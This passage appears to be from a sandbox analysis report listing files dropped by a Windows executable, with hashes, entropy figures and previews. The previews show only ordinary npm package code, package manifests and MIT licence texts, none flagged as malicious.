              Entropy (8bit):4.656570819969658
              Encrypted:false
              SSDEEP:
              MD5:8E06B27BAB3FD1CCB8DC7C16A51206CE
              SHA1:B39E3F9BCCA605AD02E8E566DE76E3EA6A4D328C
              SHA-256:20F84829CA527F284A09B5A22A55250FD3AF9BC222CA674396EC92ACD5A03016
              SHA-512:A9AE14D8958D205C23C2D33A82E146126BAD6E789B2F2847CB39058C2EDB9D11B9BB2EC5B40233BA1EB8247F884E622CBDA0B72C10314DB3240E2F582EEA3E0E
              Malicious:false
              Reputation:unknown
              Preview:const { dirname } = require('path').const getNodeModules = require('./get-node-modules.js').module.exports = path => dirname(getNodeModules(path)).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1362
              Entropy (8bit):4.7267384642462416
              Encrypted:false
              SSDEEP:
              MD5:21A5E8801924CFC7A90AA2605F26011F
              SHA1:3A8D07627992F9255463C64174374ECF85F73605
              SHA-256:1D21AC0449224C18381E41D946F5B59A95AA1663478104AF23C640A61E4B05AF
              SHA-512:52790984FD9CB205149E9EB378070FD96A071FD41BCCCB775EE373F3DD9112D72C12E1752E65181E1EA596020552C8E57B6A28DD99EDD7E4B2EF29F04F927DD3
              Malicious:false
              Reputation:unknown
              Preview:const linkBins = require('./link-bins.js').const linkMans = require('./link-mans.js')..const binLinks = opts => {. const { path, pkg, force, global, top } = opts. // global top pkgs on windows get bins installed in {prefix}, and no mans. //. // unix global top pkgs get their bins installed in {prefix}/bin,. // and mans in {prefix}/share/man. //. // non-top pkgs get their bins installed in {prefix}/node_modules/.bin,. // and do not install mans. //. // non-global top pkgs don't have any bins or mans linked. From here on. // out, if it's top, we know that it's global, so no need to pass that. // option further down the stack.. if (top && !global) {. return Promise.resolve(). }.. return Promise.all([. // allow clobbering within the local node_modules/.bin folder.. // only global bins are protected in this way, or else it is. // yet another vector for excessive dependency conflicts.. linkBins({ path, pkg, top, force: force || !top }),. linkMans({ path, pkg
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):118
              Entropy (8bit):5.011259418693879
              Encrypted:false
              SSDEEP:
              MD5:D126511D34A3656BA7EDAA9AD6A2F786
              SHA1:2D5418B538B4374E0165EA73F228555B1587A697
              SHA-256:0C3EAC813EC8EFB70EF5BFB98572C7E4D2F6D0BB43281717BA03876B74FA1C1E
              SHA-512:022BD3F607CC75D8F20A7418A26486E1043B430346AEEFE4B01D8C05D51BBD57376BDF5B189B55133E5EDB7AEC8225B7C852D82A5A20974D756F9D7A3AE10C6E
              Malicious:false
              Reputation:unknown
              Preview:const platform = process.env.__TESTING_BIN_LINKS_PLATFORM__ || process.platform.module.exports = platform === 'win32'.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):343
              Entropy (8bit):4.78020883475952
              Encrypted:false
              SSDEEP:
              MD5:31E1D7A28A99F1C6A6864008C40B5163
              SHA1:EC04A290AE18FAB8C9E734ED1E5A6C8A51F6EDE9
              SHA-256:368A4AF7BD9859EB38C2A1ADDDDDC9D8A792849015A60C82CD7A63119DEE3537
              SHA-512:FBDB7E90E8E355ED7E7FC2E3A7396B7C43E690434CDA4986286BB2B561D7AA209840E5C9E135D08879C2D2F7D93FC484D1BA76DA8A96D53F652C008C3CB34C9B
              Malicious:false
              Reputation:unknown
              Preview:const linkGently = require('./link-gently.js').const fixBin = require('./fix-bin.js')..// linking bins is simple. just symlink, and if we linked it, fix the bin up.const linkBin = ({ path, to, from, absFrom, force }) =>. linkGently({ path, to, from, absFrom, force }). .then(linked => linked && fixBin(absFrom))..module.exports = linkBin.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):775
              Entropy (8bit):4.829509587274294
              Encrypted:false
              SSDEEP:
              MD5:47B2992C86A936ABBE4B08D8453F2202
              SHA1:D8AB383895693394B0078BAD9D3562AD55D0E548
              SHA-256:02CADB3052D03B9D5B63582DF363CDA8CB4293D674B1BED3465F641E1C338E7C
              SHA-512:4599744DB3A3DACF3C8F34259A90742A16A3A46DE9561D98391913663E71AF8379067E49D8920A7BFA23303DC8425FCD6B23463A27B851733A5503E63767F797
              Malicious:false
              Reputation:unknown
              Preview:const isWindows = require('./is-windows.js').const binTarget = require('./bin-target.js').const { dirname, resolve, relative } = require('path').const linkBin = isWindows ? require('./shim-bin.js') : require('./link-bin.js').const normalize = require('npm-normalize-package-bin')..const linkBins = ({ path, pkg, top, force }) => {. pkg = normalize(pkg). if (!pkg.bin) {. return Promise.resolve([]). }. const promises = []. const target = binTarget({ path, top }). for (const [key, val] of Object.entries(pkg.bin)) {. const to = resolve(target, key). const absFrom = resolve(path, val). const from = relative(dirname(to), absFrom). promises.push(linkBin({ path, from, to, absFrom, force })). }. return Promise.all(promises).}..module.exports = linkBins.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2610
              Entropy (8bit):4.61591388665215
              Encrypted:false
              SSDEEP:
              MD5:75E837FC22CFEF5A0D3E4766829C6439
              SHA1:5B8D9FEE0D48E7AF83B9D7F5E6047856C2129EE3
              SHA-256:1F5FFFB3F282B3696D3387E9C93C6085DC7A3A7BFC73F78E245B520106476599
              SHA-512:25B728197E2B8A870C21F9955437FD5EFC240E72B6341DB153A74DE2CC5F79681910FA8A3A1FFBC6BAE1869308C840678F98F314FF53D9F1862B54E2C2594681
              Malicious:false
              Reputation:unknown
              Preview:// if the thing isn't there, skip it.// if there's a non-symlink there already, eexist.// if there's a symlink already, pointing somewhere else, eexist.// if there's a symlink already, pointing into our pkg, remove it first.// then create the symlink..const { resolve, dirname } = require('path').const { lstat, mkdir, readlink, rm, symlink } = require('fs/promises').const throwNonEnoent = er => {. if (er.code !== 'ENOENT') {. throw er. }.}..const rmOpts = {. recursive: true,. force: true,.}..// even in --force mode, we never create a link over a link we've.// already created. you can have multiple packages in a tree trying.// to contend for the same bin, or the same manpage listed multiple times,.// which creates a race condition and nondeterminism..const seen = new Set()..const SKIP = Symbol('skip - missing or already installed').const CLOBBER = Symbol('clobber - ours or in forceful mode')..const linkGently = async ({ path, to, from, absFrom, force }) => {. if (seen.has(to)) {
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1539
              Entropy (8bit):4.755024457908922
              Encrypted:false
              SSDEEP:
              MD5:13E6E48875682E6B5C1B6A74663EB95E
              SHA1:CFE1AB720E9D9D5B12C75018AE641154E9AC0D0E
              SHA-256:E79041B4D32C57A302518CEECA0BC6A94341B45F1D8F425FA5AA4619612DA8F7
              SHA-512:B0CF6FC86C4EB5561B81877CAD05F4AEE2A351EEF73FFC7C8C3A9BDA477D881DA041E00A79FD43A6DA78F7404D1B5C37A3FCD19D514F7B47F39714C0DCEBD58B
              Malicious:false
              Reputation:unknown
              Preview:const { dirname, relative, join, resolve, basename } = require('path').const linkGently = require('./link-gently.js').const manTarget = require('./man-target.js')..const linkMans = async ({ path, pkg, top, force }) => {. const target = manTarget({ path, top }). if (!target || !Array.isArray(pkg?.man) || !pkg.man.length) {. return []. }.. const links = []. // `new Set` to filter out duplicates. for (let man of new Set(pkg.man)) {. if (!man || typeof man !== 'string') {. continue. }. // break any links to c:\\blah or /foo/blah or ../blah. man = join('/', man).replace(/\\|:/g, '/').slice(1). const parseMan = man.match(/\.([0-9]+)(\.gz)?$/). if (!parseMan) {. throw Object.assign(new Error('invalid man entry name\n' +. 'Man files must end with a number, ' +. 'and optionally a .gz suffix if they are compressed.'. ), {. code: 'EBADMAN',. path,. pkgid: pkg._id,. man,. }). }.. const section = parseMan
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):232
              Entropy (8bit):4.863210425270729
              Encrypted:false
              SSDEEP:
              MD5:96A00ED07FDE9ED0AA93C45FAE776998
              SHA1:C1F79B0C274F9229BFC2A04846FBC336CDB83CF2
              SHA-256:4578C55562D0AD84E90DAE90E7E0C56E63335B8DB1471734099CBE5A4764A8E3
              SHA-512:6D1B126ACA0A06952AD328AD6B304C276D5DC6A5CD06D42C670A2F4E1E7AC123469B0078A2A5407A7D23A67D7BE27690E9829318F0F27BA1CFCFB13836D97F36
              Malicious:false
              Reputation:unknown
              Preview:const isWindows = require('./is-windows.js').const getPrefix = require('./get-prefix.js').const { dirname } = require('path')..module.exports = ({ top, path }) => !top || isWindows ? null. : dirname(getPrefix(path)) + '/share/man'.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2102
              Entropy (8bit):4.736695206998843
              Encrypted:false
              SSDEEP:
              MD5:887A9F958F95FB9A1F92A65131E8BB18
              SHA1:A35B246BEAC7E1AE7517217ACF38A9D09CC9978B
              SHA-256:C69CD87FC0FDAC8EB387925C9953DF3053ED934C7FE21CF0B844C16E4EBA795F
              SHA-512:27C81EE55003CFA72EFB8DCA79553815DA2665B7912E4C580FA9A1EF5455DA3CB85C05370F6C25D728B6420BF1B809C3DA38E2DB49E6F9D8F5C1C2205FC04302
              Malicious:false
              Reputation:unknown
              Preview:const { resolve, dirname } = require('path').const { lstat } = require('fs/promises').const throwNonEnoent = er => {. if (er.code !== 'ENOENT') {. throw er. }.}..const cmdShim = require('cmd-shim').const readCmdShim = require('read-cmd-shim')..const fixBin = require('./fix-bin.js')..// even in --force mode, we never create a shim over a shim we've.// already created. you can have multiple packages in a tree trying.// to contend for the same bin, which creates a race condition and.// nondeterminism..const seen = new Set()..const failEEXIST = ({ path, to, from }) =>. Promise.reject(Object.assign(new Error('EEXIST: file already exists'), {. path: to,. dest: from,. code: 'EEXIST',. }))..const handleReadCmdShimError = ({ er, from, to }) =>. er.code === 'ENOENT' ? null. : er.code === 'ENOTASHIM' ? failEEXIST({ from, to }). : Promise.reject(er)..const SKIP = Symbol('skip - missing or already installed').const shimBin = ({ path, to, from, absFrom, force }) => {. const shim
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1354
              Entropy (8bit):4.728138983085383
              Encrypted:false
              SSDEEP:
              MD5:D0C4C57964A9D6BEB414B0089A56B6FB
              SHA1:BE56BE2E674E58D9F9BCC33A6652A9F559DE53B0
              SHA-256:CAA948DA021DCDC424733F9CD1CC9688169DD5C44DDE82986D806CA920B6BD14
              SHA-512:14CCD2167419A55C00FE6045D0F0FBD8F54BA1BD4968E50EBBEDDA4934D045A162E00C4E1C979933EE26768A4097ABE16762A160C8A131097D93456DB027E679
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "bin-links",. "version": "4.0.3",. "description": "JavaScript package binary linker",. "main": "./lib/index.js",. "scripts": {. "snap": "tap",. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint",. "template-oss-apply": "template-oss-apply --force". },. "repository": {. "type": "git",. "url": "https://github.com/npm/bin-links.git". },. "keywords": [. "npm",. "link",. "bins". ],. "license": "ISC",. "dependencies": {. "cmd-shim": "^6.0.0",. "npm-normalize-package-bin": "^3.0.0",. "read-cmd-shim": "^4.0.0",. "write-file-atomic": "^5.0.0". },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.19.0",. "require-inject": "^1.4.4",. "tap": "^16.0.1". },. "tap": {. "check-coverage": true,. "coverage-map": "map.js",. "nyc-arg": [. "--exclude",. "tap-snapshots/**".
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2158
              Entropy (8bit):4.010344712620348
              Encrypted:false
              SSDEEP:
              MD5:CF9E3C0917AF799E0CBBE5ACF806A962
              SHA1:62F4470A453FA697C51C9BEEBD56CC96EB8BDFEE
              SHA-256:33FDE8751404D4D03E04960985A9E0FA50265706D74CA0356398A227C092629B
              SHA-512:FD855FA6F8C549B26F70EC4D156BD02DC83B3AC7FAAF2A2AA8B4A54CC5E2909D14CFD1F80CA37CFBB54904949892DF384EC0536ACD0505E564CDBE3A5F081070
              Malicious:false
              Reputation:unknown
              Preview:[.."3dm",.."3ds",.."3g2",.."3gp",.."7z",.."a",.."aac",.."adp",.."ai",.."aif",.."aiff",.."alz",.."ape",.."apk",.."appimage",.."ar",.."arj",.."asf",.."au",.."avi",.."bak",.."baml",.."bh",.."bin",.."bk",.."bmp",.."btif",.."bz2",.."bzip2",.."cab",.."caf",.."cgm",.."class",.."cmx",.."cpio",.."cr2",.."cur",.."dat",.."dcm",.."deb",.."dex",.."djvu",.."dll",.."dmg",.."dng",.."doc",.."docm",.."docx",.."dot",.."dotm",.."dra",.."DS_Store",.."dsk",.."dts",.."dtshd",.."dvb",.."dwg",.."dxf",.."ecelp4800",.."ecelp7470",.."ecelp9600",.."egg",.."eol",.."eot",.."epub",.."exe",.."f4v",.."fbs",.."fh",.."fla",.."flac",.."flatpak",.."fli",.."flv",.."fpx",.."fst",.."fvt",.."g3",.."gh",.."gif",.."graffle",.."gz",.."gzip",.."h261",.."h263",.."h264",.."icns",.."ico",.."ief",.."img",.."ipa",.."iso",.."jar",.."jpeg",.."jpg",.."jpgv",.."jpm",.."jxr",.."key",.."ktx",.."lha",.."lib",.."lvp",.."lz",.."lzh",.."lzma",.."lzo",.."m3u",.."m4a",.."m4v",.."mar",.."mdi",.."mht",.."mid",.."midi",.."mj2",.."mka",.."mkv",.."mmr"
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):54
              Entropy (8bit):4.5137847242254345
              Encrypted:false
              SSDEEP:
              MD5:1CCD550E0730DF056A88FB1A090DEE67
              SHA1:322ABEBC9731F9D1F2258BE4A3B4B9D10624BA37
              SHA-256:5B2859EC9677F14E6499B135B2E05A083FD2A1AFCE18175AC0658BC9D4C49774
              SHA-512:9A81B601C909D5B0FC34B3D90805F704B91E73E7FF411C17EBD41676A2E2DA17FC066EAE3C7BDE565BFE009A3A5446F26337753C34702A5E55FD2B59C8D1C1FD
              Malicious:false
              Reputation:unknown
              Preview:module.exports = require('./binary-extensions.json');.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (460)
              Category:dropped
              Size (bytes):1159
              Entropy (8bit):5.123422116147725
              Encrypted:false
              SSDEEP:
              MD5:DA0684B7C90DCEA9333D6517F4FBDA22
              SHA1:099EC1CE6AEC30693CDA4EFF5F90F0B75E13C83A
              SHA-256:85FE65EEFAB89E2A683232B96E6F689279821A0BD3B351E9AB6A6EBD19DEA567
              SHA-512:5B3BDAA67E26731727C2FDB4FE50E5562F94AC73F62A5271D7515CA91AA794C71669E0507DE4A375AA1FCECD9915351BECC96842C80B5C86492CC27BB24C24BE
              Malicious:false
              Reputation:unknown
              Preview:MIT License..Copyright (c) 2019 Sindre Sorhus <sindresorhus@gmail.com> (https://sindresorhus.com), Paul Miller (https://paulmillr.com)..Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILI
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):652
              Entropy (8bit):4.736555510809632
              Encrypted:false
              SSDEEP:
              MD5:D2FAE281CE985BBEF1B5D5445013330A
              SHA1:DB5533C64B2CCA9D5D3B7DE9B86C0A817ED5E12D
              SHA-256:9DF74968F4F13CE752B65473847C6742BECDC0E7F7A6BD6FD7EB3E612B28DD81
              SHA-512:42E3094C3709103CF137F08A495B7ACBB60681DB123E27848BB22BC0A7972546DE7E688C1B007B6CE68F07885098E0D6217138377F44FBB0332D92112F8E4FC1
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "binary-extensions",.."version": "2.2.0",.."description": "List of binary file extensions",.."license": "MIT",.."repository": "sindresorhus/binary-extensions",.."author": {..."name": "Sindre Sorhus",..."email": "sindresorhus@gmail.com",..."url": "sindresorhus.com"..},.."engines": {..."node": ">=8"..},.."scripts": {..."test": "xo && ava && tsd"..},.."files": [..."index.js",..."index.d.ts",..."binary-extensions.json",..."binary-extensions.json.d.ts"..],.."keywords": [..."binary",..."extensions",..."extension",..."file",..."json",..."list",..."array"..],.."devDependencies": {..."ava": "^1.4.1",..."tsd": "^0.7.2",..."xo": "^0.24.0"..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1096
              Entropy (8bit):5.138997897915593
              Encrypted:false
              SSDEEP:
              MD5:A5DF515EF062CC3AFFD8C0AE59C059EC
              SHA1:433C2B9C71BAD0957F4831068C2F5D973CEF98A9
              SHA-256:68F12F6E2C33688699249C01D8F9623C534DA20AA71989C57B061B7BC1676D14
              SHA-512:0B0068B8BEB6864DBB6971D9FE165D2D5FD420BCD6D7BBBD8F42589EB981BF95D854DF2D16C21D378EA6D48F562345D2F66DE0FD17134DFFA8495EB496E6DFF0
              Malicious:false
              Reputation:unknown
              Preview:MIT License..Copyright (c) 2013 Julian Gruber <julian@juliangruber.com>..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISIN
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4992
              Entropy (8bit):4.722743418858291
              Encrypted:false
              SSDEEP:
              MD5:795F787BE90F6DAF96D64087F2428723
              SHA1:6C479385902B5ADC1B4343472922324AA312296C
              SHA-256:6F6A12F42623BF53B6561D46C5E37C0F26B6471BA53E83C3B933FB2C2F139742
              SHA-512:F093A66EF5F0E79085195571421A3EBC7681BBE41ADD742FB5A7EFBD660FC3F6CCD6E6C8A95C4334A91232B6E0A45AEBB84539EF7FEF05FA21C63E36D2757175
              Malicious:false
              Reputation:unknown
              Preview:var balanced = require('balanced-match');..module.exports = expandTop;..var escSlash = '\0SLASH'+Math.random()+'\0';.var escOpen = '\0OPEN'+Math.random()+'\0';.var escClose = '\0CLOSE'+Math.random()+'\0';.var escComma = '\0COMMA'+Math.random()+'\0';.var escPeriod = '\0PERIOD'+Math.random()+'\0';..function numeric(str) {. return parseInt(str, 10) == str. ? parseInt(str, 10). : str.charCodeAt(0);.}..function escapeBraces(str) {. return str.split('\\\\').join(escSlash). .split('\\{').join(escOpen). .split('\\}').join(escClose). .split('\\,').join(escComma). .split('\\.').join(escPeriod);.}..function unescapeBraces(str) {. return str.split(escSlash).join('\\'). .split(escOpen).join('{'). .split(escClose).join('}'). .split(escComma).join(','). .split(escPeriod).join('.');.}...// Basically just str.split(","), but handling cases.// where we have nested braced sections, which should be.// treated
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1092
              Entropy (8bit):4.651286928367065
              Encrypted:false
              SSDEEP:
              MD5:4B877FCF0149128ACF15926C546B8B98
              SHA1:7B48982E1637DD5DEE1F571CD7C98054B46FB032
              SHA-256:4A9AE315FFC10674F4A71EA4465103E77426D86AEB2C23737607181F3F31344F
              SHA-512:C2197EFE496DB792BBEFCE4D68BBAF63204A53267E8A36BF476521718C5E67E418165DEC16F260C521B18C4B54A65862FE94A1A2385C18C191565FA7DA900DB8
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "brace-expansion",. "description": "Brace expansion as known from sh/bash",. "version": "2.0.1",. "repository": {. "type": "git",. "url": "git://github.com/juliangruber/brace-expansion.git". },. "homepage": "https://github.com/juliangruber/brace-expansion",. "main": "index.js",. "scripts": {. "test": "tape test/*.js",. "gentest": "bash test/generate.sh",. "bench": "matcha test/perf/bench.js". },. "dependencies": {. "balanced-match": "^1.0.0". },. "devDependencies": {. "@c4312/matcha": "^1.3.1",. "tape": "^4.6.0". },. "keywords": [],. "author": {. "name": "Julian Gruber",. "email": "mail@juliangruber.com",. "url": "http://juliangruber.com". },. "license": "MIT",. "testling": {. "files": "test/*.js",. "browsers": [. "ie/8..latest",. "firefox/20..latest",. "firefox/nightly",. "chrome/25..latest",. "chrome/canary",. "opera/12..latest",. "opera/next",. "safari/5.1..latest",. "ipa
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):2788
              Entropy (8bit):5.116752769694121
              Encrypted:false
              SSDEEP:
              MD5:FE1F8D38872207DB9CB96D8F7D3AD89C
              SHA1:E071CD3A0DFAD864BAA54DA0003276D84238EF5D
              SHA-256:CA3D96437F69CEB38DF1972DB017FCD6303B02F57EA1F838AB9F9C3DB3E789E0
              SHA-512:A238907BA19E6DA23EC12450E44C37481AE5F3E2DF720CE2B40420FE16604FD10FC4253129192397A2FA9F42528CC3522160120C1D76606303B6331497AFAD10
              Malicious:false
              Reputation:unknown
              Preview:# Authors..#### Ordered by first contribution...- Romain Beauxis (toots@rastageeks.org).- Tobias Koppers (tobias.koppers@googlemail.com).- Janus (ysangkok@gmail.com).- Rainer Dreyer (rdrey1@gmail.com).- To.nis Tiigi (tonistiigi@gmail.com).- James Halliday (mail@substack.net).- Michael Williamson (mike@zwobble.org).- elliottcable (github@elliottcable.name).- rafael (rvalle@livelens.net).- Andrew Kelley (superjoe30@gmail.com).- Andreas Madsen (amwebdk@gmail.com).- Mike Brevoort (mike.brevoort@pearson.com).- Brian White (mscdex@mscdex.net).- Feross Aboukhadijeh (feross@feross.org).- Ruben Verborgh (ruben@verborgh.org).- eliang (eliang.cs@gmail.com).- Jesse Tane (jesse.tane@gmail.com).- Alfonso Boza (alfonso@cloud.com).- Mathias Buus (mathiasbuus@gmail.com).- Devon Govett (devongovett@gmail.com).- Daniel Cousens (github@dcousens.com).- Joseph Dykstra (josephdykstra@gmail.com).- Parsha Pourkhomami (parshap+git@gmail.com).- Damjan Ko.ir (damjan.kosir@gmail.com).- daverayment (dave.rayment@
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1106
              Entropy (8bit):5.085027895256275
              Encrypted:false
              SSDEEP:
              MD5:E49E579DBCC02CF1F699DEEC85FD96F0
              SHA1:4AE7988E5AF66B48B6D74A70FB30C4AEDDA141EE
              SHA-256:06BAFA45FDAD2579BA0E43B0C9B2C6290287C99C4203C300254A462B38A307F6
              SHA-512:0B8824C1D0AE5F4E0FFFC595DFDFA88D724365DE168EFF4B40A68B7A30DFDE2C9F65A132B7D4770104F5360D4EA800AF0507ED6F585AF60003B0D385C09B0593
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) Feross Aboukhadijeh, and other contributors...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWI
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):58353
              Entropy (8bit):4.938298339636901
              Encrypted:false
              SSDEEP:
              MD5:1584EEFFA4BC7066890E52089A44C4D9
              SHA1:FB3CE041D41FB0112F1EC626A1ECEF638EE9BCF0
              SHA-256:C25853FD31ADDFCE188B01061FE85BFE667D5FB6C7A7BBB1C83D0DDFD8627ACC
              SHA-512:0742FC0379C3D0A1614155B035341AADB514783196518CC2D140911D09E578AACBC49D6F174D9CFC8C9FD940B83A3F363D76A7F3F004C9839FBB6F7D2EC2A70A
              Malicious:false
              Reputation:unknown
              Preview:/*!. * The buffer module from node.js, for the browser.. *. * @author Feross Aboukhadijeh <https://feross.org>. * @license MIT. */./* eslint-disable no-proto */..'use strict'..const base64 = require('base64-js').const ieee754 = require('ieee754').const customInspectSymbol =. (typeof Symbol === 'function' && typeof Symbol['for'] === 'function') // eslint-disable-line dot-notation. ? Symbol['for']('nodejs.util.inspect.custom') // eslint-disable-line dot-notation. : null..exports.Buffer = Buffer.exports.SlowBuffer = SlowBuffer.exports.INSPECT_MAX_BYTES = 50..const K_MAX_LENGTH = 0x7fffffff.exports.kMaxLength = K_MAX_LENGTH../**. * If `Buffer.TYPED_ARRAY_SUPPORT`:. * === true Use Uint8Array implementation (fastest). * === false Print warning and recommend using `buffer` v4.x which has an Object. * implementation (most compatible, even IE6). *. * Browsers that support typed arrays are IE 10+, Firefox 4+, Chrome 7+, Safari 5.1+,. * Opera 11.6+, iOS 4.2+.. *.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2546
              Entropy (8bit):4.7665616849286545
              Encrypted:false
              SSDEEP:
              MD5:01545DA3F0B70BE66774741A921545A7
              SHA1:3156A9CD35DC750BEBC2EAAF42A5933C8EE6B892
              SHA-256:5B105AC0ABBF5985CBE62AD28A34032D85C7EF623E0EB01F39441B0FEB419004
              SHA-512:D7B4AB6314C1E98E7C519967D2F011711CA653B525D94685FB6D0A3A8C5BDD10E74CE23E635751E6B87B3F88619C2AF82103FA95B28059AC16817777EFD6C6DD
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "buffer",. "description": "Node.js Buffer API, for the browser",. "version": "6.0.3",. "author": {. "name": "Feross Aboukhadijeh",. "email": "feross@feross.org",. "url": "https://feross.org". },. "bugs": {. "url": "https://github.com/feross/buffer/issues". },. "contributors": [. "Romain Beauxis <toots@rastageeks.org>",. "James Halliday <mail@substack.net>". ],. "dependencies": {. "base64-js": "^1.3.1",. "ieee754": "^1.2.1". },. "devDependencies": {. "airtap": "^3.0.0",. "benchmark": "^2.1.4",. "browserify": "^17.0.0",. "concat-stream": "^2.0.0",. "hyperquest": "^2.1.3",. "is-buffer": "^2.0.5",. "is-nan": "^1.3.0",. "split": "^1.0.1",. "standard": "*",. "tape": "^5.0.1",. "through2": "^4.0.2",. "uglify-js": "^3.11.5". },. "homepage": "https://github.com/feross/buffer",. "jspm": {. "map": {. "./index.js": {. "node": "@node/buffer". }. }. },. "keywords": [. "arraybuffer",.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1083
              Entropy (8bit):5.141633932291246
              Encrypted:false
              SSDEEP:
              MD5:69AEF5FFCB6A0882BAE34C8ED4A21C57
              SHA1:EAAE4471922C8E3E89E7F74DB308322DB7EDE597
              SHA-256:819D454AE5C5A9D05197D20F66F835EBFA5987FFE497B03F77ED735DF21A8ADE
              SHA-512:7B2AFAB624021CEA3EDD11F9BE2A667D36BBAF04E617C5716313D79D043FA5758513D87C7724CAA281A9F19B70324BC0696187D17A45238D0CC880A80500F5A0
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) 2015 Julian Gruber <julian@juliangruber.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT O
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1448
              Entropy (8bit):4.803821483158595
              Encrypted:false
